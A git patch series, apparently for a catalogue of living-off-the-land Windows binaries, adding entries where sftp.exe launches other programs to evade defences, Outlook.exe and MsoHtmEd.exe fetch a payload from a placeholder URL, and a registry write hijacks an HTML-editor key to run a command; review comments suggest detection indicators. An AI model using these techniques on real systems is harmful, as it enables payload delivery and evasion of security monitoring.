From 860246fe1816001b186ab4f5e0347b81918ffd3c Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Sun, 6 Nov 2022 20:19:45 +0700 Subject: [PATCH 1/7] Add sftp.exe executor c:\windows\system32\openssh\sftp.exe with the -D flag, is able to execute another exe file --- yml/OSBinaries/sftp | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 yml/OSBinaries/sftp diff --git a/yml/OSBinaries/sftp b/yml/OSBinaries/sftp new file mode 100644 index 00000000..114b9f3e --- /dev/null +++ b/yml/OSBinaries/sftp @@ -0,0 +1,20 @@ +--- +Name: sftp.exe +Description: SSH File Transfer Protocol +Author: Nir Chako +Created: 2022-11-06 +Commands: + - Command: "sftp -D c:\windows\system32\notepad.exe" + Description: Execute notepad.exe with sftp.exe as parent process + Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: c:\windows\system32\OpenSSH\sftp.exe +Detection: + - IOC: sftp.exe spawning unexpected processes +Acknowledgement: + - Person: 'Nir Chako (Pentera)' + Handle: '@C_h4ck_0' From da86328865090c6ee802789a4117b0e46ae93ad2 Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Sun, 6 Nov 2022 20:26:13 +0700 Subject: [PATCH 2/7] Rename sftp to sftp.yml --- yml/OSBinaries/{sftp => sftp.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename yml/OSBinaries/{sftp => sftp.yml} (100%) diff --git a/yml/OSBinaries/sftp b/yml/OSBinaries/sftp.yml similarity index 100% rename from yml/OSBinaries/sftp rename to yml/OSBinaries/sftp.yml From 8fafb0217113ce1e09068da26198c8da04c9686e Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Sun, 6 Nov 2022 20:31:24 +0700 Subject: [PATCH 3/7] fix yaml-lint syntax error --- yml/OSBinaries/sftp.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/yml/OSBinaries/sftp.yml b/yml/OSBinaries/sftp.yml index 114b9f3e..22396c96 100644 --- a/yml/OSBinaries/sftp.yml +++ b/yml/OSBinaries/sftp.yml @@ -4,7 +4,7 @@ Description: SSH File Transfer Protocol Author: Nir Chako Created: 2022-11-06 Commands: - - Command: "sftp -D c:\windows\system32\notepad.exe" + - Command: "sftp -D c:\\windows\\system32\\notepad.exe" Description: Execute notepad.exe with sftp.exe as parent process Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures Category: Execute From 0c0e242481037c01ee35504d451b777006338516 Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Tue, 8 Nov 2022 21:53:10 +0700 Subject: [PATCH 4/7] Add Outlook.exe downloader --- yml/OtherMSBinaries/Outlook.yml | 34 +++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 yml/OtherMSBinaries/Outlook.yml diff --git a/yml/OtherMSBinaries/Outlook.yml b/yml/OtherMSBinaries/Outlook.yml new file mode 100644 index 00000000..a7efcf35 --- /dev/null +++ b/yml/OtherMSBinaries/Outlook.yml 
@@ -0,0 +1,34 @@ +--- +Name: Outlook.exe +Description: Microsoft Office component +Author: Nir Chako +Created: 2022-11-08 +Commands: + - Command: Outlook.exe https://example.com/payload + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Outlook.exe + - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office16\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Outlook.exe + - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office15\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Outlook.exe + - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office14\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office14\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office12\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe +Detection: + - IOC: Suspicious Office application internet/network traffic +Acknowledgement: + - Person: Nir Chako (Pentera) + Handle: '@C_h4ck_0' From e803bc7635ebd4bebac4d30e806937fc58151910 Mon Sep 17 00:00:00 2001 
From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Mon, 14 Nov 2022 13:45:59 +0700 Subject: [PATCH 5/7] Update sftp.yml * Added another way of using sftp for execution * Added Download functionality --- yml/OSBinaries/sftp.yml | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/yml/OSBinaries/sftp.yml b/yml/OSBinaries/sftp.yml index 22396c96..7159022b 100644 --- a/yml/OSBinaries/sftp.yml +++ b/yml/OSBinaries/sftp.yml @@ -11,10 +11,25 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + - Command: "sftp -S c:\\windows\\system32\\notepad.exe localhost" + Description: Execute notepad.exe with sftp.exe as parent process + Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 + - Command: "sftp @: " + Description: Download file with sftp.exe from an FTP server + Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures. If needed, you will be asked to submit a password for the sFTP session. + Category: Download + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\OpenSSH\sftp.exe Detection: - IOC: sftp.exe spawning unexpected processes + - IOC: Suspicious sFTP internet/network traffic Acknowledgement: - Person: 'Nir Chako (Pentera)' Handle: '@C_h4ck_0' From 9dba4379d49499f7f60b8286458bf9e814bae7c6 Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Sun, 7 May 2023 14:25:29 +0700 Subject: [PATCH 6/7] Update MsoHtmEd.yml --- yml/OtherMSBinaries/MsoHtmEd.yml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/yml/OtherMSBinaries/MsoHtmEd.yml b/yml/OtherMSBinaries/MsoHtmEd.yml index fb2ac30b..74dad517 100644 --- a/yml/OtherMSBinaries/MsoHtmEd.yml +++ b/yml/OtherMSBinaries/MsoHtmEd.yml 
@@ -4,6 +4,13 @@ Description: Microsoft Office component Author: Nir Chako Created: 2022-07-24 Commands: + - Command: MsoHtmEd.exe https://any-valid-link-to-download-any-html-file-from.com + Description: Execute a command line from the registry + Usecase: Set this registry key with the desired commaned you want to trigger - reg add "HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command" /f /t REG_SZ /d "calc.exe" + Category: Execute + Privileges: User + MitreID: T1218 + OperatingSystem: Windows 10, Windows 11 - Command: MsoHtmEd.exe https://example.com/payload Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) From 7cdc9263fb198c884115864c74b71dd65c9ac064 Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Sun, 7 May 2023 14:26:12 +0700 Subject: [PATCH 7/7] Update MsoHtmEd.yml --- yml/OtherMSBinaries/MsoHtmEd.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/MsoHtmEd.yml b/yml/OtherMSBinaries/MsoHtmEd.yml index 74dad517..6f2fdd0c 100644 --- a/yml/OtherMSBinaries/MsoHtmEd.yml +++ b/yml/OtherMSBinaries/MsoHtmEd.yml @@ -6,7 +6,7 @@ Created: 2022-07-24 Commands: - Command: MsoHtmEd.exe https://any-valid-link-to-download-any-html-file-from.com Description: Execute a command line from the registry - Usecase: Set this registry key with the desired commaned you want to trigger - reg add "HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command" /f /t REG_SZ /d "calc.exe" + Usecase: Set this registry key with the desired commaned you want to trigger (this example executes calc.exe) - reg add "HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command" /f /t REG_SZ /d "calc.exe" Category: Execute Privileges: User MitreID: T1218
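Review bot: In the PATCH 1/7 hunk creating `yml/OSBinaries/sftp`, the value `"sftp -D c:\windows\system32\notepad.exe"` is a double-quoted YAML scalar with unescaped backslashes, so `\w` and `\s` are invalid escape sequences and the file will not parse; the file is also created without the `.yml` extension the rest of the collection uses. Both problems are fixed later in this series (PATCH 2/7 renames the file, PATCH 3/7 doubles the backslashes), so squash those three commits into one so the history never contains an entry that fails yaml-lint. The `Detection:` IOC "sftp.exe spawning unexpected processes" is the right signal for this entry: the commit message says `-D` makes sftp.exe launch another executable, so any child of `c:\windows\system32\OpenSSH\sftp.exe` that is not the expected SFTP server program is what defenders should alert on; consider stating that expected-child baseline in the IOC text.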
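Review bot: In the PATCH 4/7 hunk creating `yml/OtherMSBinaries/Outlook.yml`, the `Full_Path:` list ends with `C:\Program Files\Microsoft Office\Office12\Outlook.exe` twice; drop the duplicate line. The Usecase text names a concrete on-disk artifact, the cache folder `%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE`, but `Detection:` only lists "Suspicious Office application internet/network traffic"; add a second IOC for files written to that cache path by Outlook.exe so defenders have a host-based indicator as well as a network one. Also quote the `Person:` value (`'Nir Chako (Pentera)'`) to match the form used in `sftp.yml` in this same series.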
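Review bot: In the PATCH 5/7 hunk for `yml/OSBinaries/sftp.yml`, the third command is written as `"sftp @: "` with no user, host or remote-path placeholders, so the entry cannot be followed as documented; spell the placeholders out explicitly. Its Description says the file is downloaded "from an FTP server", but sftp.exe speaks SFTP over SSH, not FTP; say "SFTP server", and settle on one spelling ("sFTP" in the Usecase and the new IOC versus "SFTP") across the entry. The Download entry also keeps `MitreID: T1202`, copied from the two Execute entries; `Outlook.yml` in this same series maps its Download entry to `T1105`, so the sftp download entry should use the same mapping. Finally, the Usecase for the `-S` command is a verbatim copy of the `-D` one; a sentence saying that `-S` names the program sftp.exe runs for its connection (which is why `localhost` is needed on the command line) would tell a reader why the two entries differ.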
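Review bot: In the PATCH 6/7 hunk for `yml/OtherMSBinaries/MsoHtmEd.yml`, the Usecase line has a typo ("commaned"), and the example URL `https://any-valid-link-to-download-any-html-file-from.com` breaks the `https://example.com/payload` placeholder convention that the adjacent Download entry in the same file uses; reuse that placeholder. More importantly, the execution described here depends on the `HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command` value being written first, yet the hunk adds no matching `Detection:` entry; add an IOC for modifications to that registry value and for MsoHtmEd.exe spawning a child process, since the registry write is the observable precondition and the child process is the observable result.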
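Review bot: In the PATCH 7/7 hunk, the rewritten Usecase line still carries the "commaned" typo from PATCH 6/7; fix it in the same edit, and fold this one-line change into PATCH 6/7, since both commits touch only that line and a single commit is easier to review.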